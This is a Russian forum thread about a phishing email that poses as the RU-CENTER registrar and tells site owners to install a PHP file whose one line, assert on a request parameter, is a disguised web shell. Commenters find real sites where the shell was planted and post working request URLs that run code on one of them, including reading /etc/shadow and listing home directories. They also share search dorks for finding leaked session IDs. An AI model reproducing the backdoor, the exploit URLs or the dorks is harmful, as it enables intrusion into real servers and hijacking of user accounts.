- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
Уважаемый клиент!
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить,
что фактическое управление доменом ******* осуществляется лицом,
указанным в качестве его администратора.
Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом,
создайте в корневой директории сайта файл a7offau08fn0f81n.php со следующим
содержимым:
<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>
Файл должен быть создан в течение трех рабочих дней с момента получения
настоящего письма и находиться на сервере до 24 декабря 2016 года, 20:00
(UTC+03:00), в противном случае процедура подтверждения не будет пройдена.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет
пройдена, делегирование домена будет приостановлено.
© АО «Региональный Сетевой Информационный Центр» (RU-CENTER)
8 800 775-29-99, 8 800 250-27-99,
+7 495 994-46-01
Вы подписались на рассылку в настройках уведомлений.
Отписаться от рассылки
guest 07.01.2017 20:09 # +4
Интересно, в какой функции здесь remote code execution - в stripslashes или в assert? Не удивлюсь, если в обоих.
bormand 07.01.2017 20:12 # +5
Царь проектировал.
bormand 07.01.2017 20:21 # 0
guest 07.01.2017 20:59 # −6
1024-- 07.01.2017 20:58 # +3
Более подозрительная питушня. Если не знаешь пхп в совершенстве, не начнёшь подозревать assert.
defecate-plusplus 07.01.2017 20:59 # 0
inkanus-gray 07.01.2017 21:50 # 0
defecate-plusplus 07.01.2017 22:00 # +1
1024-- 07.01.2017 22:02 # +5
bakagaijin 07.01.2017 23:47 # +2
barop 08.01.2017 02:51 # +2
Это где сорокапятиилетний жадный девственник с лысиной, пузом и отдышкой, живущий с мамой, и любящий играть в танчики пытается найти девушку своей мечты?
bakagaijin 08.01.2017 17:07 # +2
bormand 08.01.2017 17:09 # +1
Надо было ещё ИИ для знакомства.
bakagaijin 08.01.2017 19:32 # 0
barop 09.01.2017 13:06 # −2
Фу
huge_cock 09.01.2017 13:44 # +3
barop 09.01.2017 13:46 # 0
huge_cock 09.01.2017 13:57 # +1
guest 10.01.2017 08:53 # 0
guest 10.01.2017 06:45 # 0
Капча то хуйня, в общем-то.
bakagaijin 10.01.2017 12:45 # −1
barop 10.01.2017 13:06 # −1
Сложно сказать что хуже.
bakagaijin 10.01.2017 13:34 # 0
Xom94ok 07.01.2017 21:08 # +1
guestinho 07.01.2017 22:09 # +2
dm_fomenok 07.01.2017 23:38 # +7
j123123 08.01.2017 13:00 # +4
http://psyaba.ru/index/a7offau08fn0f81n_php/0-31
http://monrostudio.ru/a7offau08fn0f81n-php
bormand 08.01.2017 13:05 # 0
inkanus-gray 08.01.2017 13:33 # +1
http://www.balans-auto.ru/a1offau08f10z81n.php
inkanus-gray 08.01.2017 13:37 # +3
http://www.balans-auto.ru/a1offau08f10z81n.php?R01=printf('TbI+XYU ');
http://www.balans-auto.ru/a1offau08f10z81n.php?R01=phpinfo();
inkanus-gray 08.01.2017 13:44 # 0
http://www.balans-auto.ru/a1offau08f10z81n.php?R01=var_dump(file('/etc/shadow'));
j123123 08.01.2017 13:51 # 0
inkanus-gray 08.01.2017 13:54 # 0
http://www.balans-auto.ru/a1offau08f10z81n.php?R01=var_dump(scandir('/home/c17271/public_html'));
inkanus-gray 08.01.2017 16:05 # 0
Пруф, что сработало, проверьте:
http://www.balans-auto.ru/
defecate-plusplus 08.01.2017 16:11 # +2
через неделю ему напишут сайт-визитку, а через три он обеспечит прибылью своих внуков
inkanus-gray 08.01.2017 16:19 # 0
huge_cock 08.01.2017 16:22 # 0
defecate-plusplus 08.01.2017 16:19 # 0
paid-till: 2017.01.26
вебархив дает странную картину, в 2014 было че-то, в 2015 уже грусть
bormand 08.01.2017 16:22 # 0
Кто-то проверил, что работает unlink()?
huge_cock 08.01.2017 16:24 # 0
inkanus-gray 08.01.2017 16:27 # 0
defecate-plusplus 08.01.2017 16:31 # +1
огромного питуха тут тоже переживут
inkanus-gray 08.01.2017 17:47 # 0
huge_cock 08.01.2017 16:32 # +3
inkanus-gray 08.01.2017 16:33 # 0
huge_cock 08.01.2017 16:35 # 0
huge_cock 08.01.2017 16:13 # +1
P.S.: Я про "unlink()".
inkanus-gray 08.01.2017 16:15 # 0
huge_cock 08.01.2017 16:16 # 0
bormand 08.01.2017 16:16 # +2
huge_cock 08.01.2017 16:17 # +2
barop 09.01.2017 13:05 # 0
defecate-plusplus 08.01.2017 16:25 # +2
huge_cock 08.01.2017 16:18 # 0
huge_cock 09.01.2017 13:30 # +3
inkanus-gray 09.01.2017 13:38 # 0
2 октября 2016: Приветствуем! Сайт balans-auto.ru только что создан.
7 марта 2016: Приветствуем! Сайт balans-auto.ru только что создан.
9 января 2016: Приветствуем! Сайт balans-auto.ru только что создан.
16 ноября 2015: Приветствуем! Сайт balans-auto.ru только что создан.
1 августа 2015: Приветствуем! Сайт balans-auto.ru только что создан.
16 декабря 2014: Автоломбард по займу денег в Москве - +7929-636-7575 Круглосуточно
Таким образом, сайт исчез в промежутке между 16 декабря 2014 и 1 августа 2015. Значит, владельцу похуй уже полтора-два года.
inkanus-gray 26.01.2017 13:43 # +2
https://yandex.ru/search/?text=site%3Abalans-auto.ru
https://www.google.ru/search?q=site%3Abalans-auto.ru
http://www.bing.com/search?q=site%3Abalans-auto.ru
inkanus-gray 08.01.2017 13:30 # +3
http://oknacolor.ru/a7offau08fn0f81n.php
P.S. Гуглим ещё это:
a7odfa980f11ce6.php
a7offau12fn0f83f.php
a1offau08f10z81n.php
a1offau08fn0f81n.php
bormand 08.01.2017 18:32 # −1
inkanus-gray 08.01.2017 18:35 # +1
Говорят, в своё время куча эсэмэсок, отправленных пользователям «Мегафона», утекли в сеть благодаря Яндекс.Бару, потому что там была авторизация через get-параметр.
А за пользователями Хрома иногда ходит Гуглобот...
bormand 08.01.2017 18:41 # 0
facepalm.jpg
inkanus-gray 08.01.2017 18:55 # 0
inurl:sessid
inurl:sessionid
inurl:session_id
inurl:phpsessid
inurl:phpsessionid
inurl:phpsession_id
И ещё что-нибудь в таком духе.
Ещё некоторые сайты (сайты знакомств, интернет-магазины) присылают по е-мейлу уведомления о новых событиях, а в письмо вкладывают ссылку с токеном для авторизации. Если такая ссылка утечёт в поисковик, то поисковик сможет выполнять действия от твоего имени...
bormand 08.01.2017 18:58 # 0
Забавно будет, если действия тоже через get.
inkanus-gray 08.01.2017 18:58 # 0
defecate-plusplus 08.01.2017 19:13 # +2
Для пыхопитушни, однако, обычное дело
Более того, такой одноразовый токен и нужен то только для восстановления пароля. В остальных случаях юзера надо для начала на страницу логина сводить (если куки отсутствуют при достижении целевой страницы)
inkanus-gray 08.01.2017 19:21 # −1
bormand 08.01.2017 19:22 # 0
inkanus-gray 08.01.2017 19:23 # +2
Говорят, что в Одноклассниках когда-то давным давно sessionid был в get-параметрах, но потом убрали.
bormand 08.01.2017 19:25 # +1
Зато они логин по хттп до последнего держали.
inkanus-gray 08.01.2017 19:26 # 0
bormand 08.01.2017 19:27 # −1
З.Ы. Кстати, на рутрекере она тоже есть.
inkanus-gray 08.01.2017 19:28 # +2
Только несколько месяцев назад всех перевели на https и галочку убрали.
guest 10.01.2017 06:51 # +3
inkanus-gray 08.01.2017 19:30 # −1
bormand 08.01.2017 19:31 # −1
Это у всех так, походу. В кои-то веки можно залогиниться и поюзать нормальный поиск...
inkanus-gray 08.01.2017 19:32 # 0
guest 10.01.2017 06:51 # 0
Не понял.
bormand 10.01.2017 06:57 # 0
guest 10.01.2017 07:05 # 0
guest 10.01.2017 08:28 # 0
huge_cock 10.01.2017 08:35 # 0
guest 10.01.2017 08:55 # −1
huge_cock 10.01.2017 08:58 # +2
guest 10.01.2017 10:30 # −1
guest 10.01.2017 14:38 # −1
bormand 10.01.2017 17:49 # −1
Ну через тор-браузер неудобно же.
defecate-plusplus 10.01.2017 18:02 # −1
bormand 10.01.2017 18:22 # 0
Да на крайний случай можно и голландцем прикинуться в пару команд... А аддоны я не люблю, да и ставить их лень.
inkanus-gray 11.01.2017 00:41 # −1
barop 11.01.2017 00:45 # −1
Там внутрях найдешь ты хттпс проксю, на которую можно ходить даже если сайт не забанен
Правда никто не умеет в настройки прокси по хттпс без PAC: только хром может если сказать --proxy=
guest 10.01.2017 06:50 # 0
huge_cock 08.01.2017 16:34 # +3
inkanus-gray 08.01.2017 16:39 # −1
huge_cock 08.01.2017 16:40 # +2
inkanus-gray 08.01.2017 16:42 # −1
huge_cock 08.01.2017 16:43 # +3
inkanus-gray 08.01.2017 16:46 # +1
huge_cock 08.01.2017 16:47 # 0
bormand 08.01.2017 17:07 # −1
huge_cock 08.01.2017 17:12 # 0
bormand 08.01.2017 17:23 # 0
huge_cock 08.01.2017 17:26 # +1
inkanus-gray 08.01.2017 18:19 # 0
http://kkblog.ru/phishing-spam/
Прямая ссылка на скриншот, чтобы не читать много буков:
http://kkblog.ru/wp-content/uploads/2016/12/rkn-phishing.png
P.S.:
https://habrahabr.ru/post/265515/
bormand 08.01.2017 20:50 # +2
inkanus-gray 09.01.2017 13:20 # +4
j123123 11.12.2019 22:08 # +3
Аноним (9):
Язык весьма неплохой. В каждой функции есть своя изюминка. Например, при помощи file_exists() можно не только проверить существование файла, но и начать выполнять код, заботливо предоставленный третьей стороной. Удобная фича, рекомендую.
Если в вашем языке функция проверки существования файла не способна запускать код, просьба меня не беспокоить.
XYPO3BO3 11.12.2019 22:13 # 0
guest8 11.12.2019 22:14 # −999
Stallman 11.12.2019 22:27 # 0
gost 11.12.2019 22:40 # +1
Stallman 11.12.2019 22:59 # 0
Но вроде ж поддержка этого говна по дефолту выключена в РНР.ІИI...
XYPO3BO3 11.12.2019 23:16 # 0
guest8 11.12.2019 23:20 # −999
zhigolo 11.12.2019 23:22 # 0
inkanus_gray 11.12.2019 23:22 # 0
zhigolo 11.12.2019 23:23 # 0
Stallman 11.12.2019 23:38 # 0
XYPO3BO3 12.12.2019 00:01 # 0
Чтобы отключить, нужно перекомпилировать, предварительно запустив ./configure --disable-phar.
XYPO3BO3 12.12.2019 00:07 # 0
gost 11.12.2019 22:42 # 0
Какой багор )))
guestinxo 11.12.2019 22:46 # 0
Какая смекалка )))
guest8 11.12.2019 22:52 # −999
XYPO3BO3 11.12.2019 22:59 # 0
guestinxo 11.12.2019 23:01 # 0
XYPO3BO3 11.12.2019 23:13 # 0
guest8 11.12.2019 23:15 # −999
j123123 11.12.2019 23:19 # 0
>Центр гомеопатии в Куркино
Хмм.. Интересно, бывает ли гомеопатическая психология?
gost 11.12.2019 23:37 # 0
XYPO3BO3 12.12.2019 01:06 # +1
guest8 12.12.2019 01:12 # −999
guest8 11.12.2019 22:45 # −999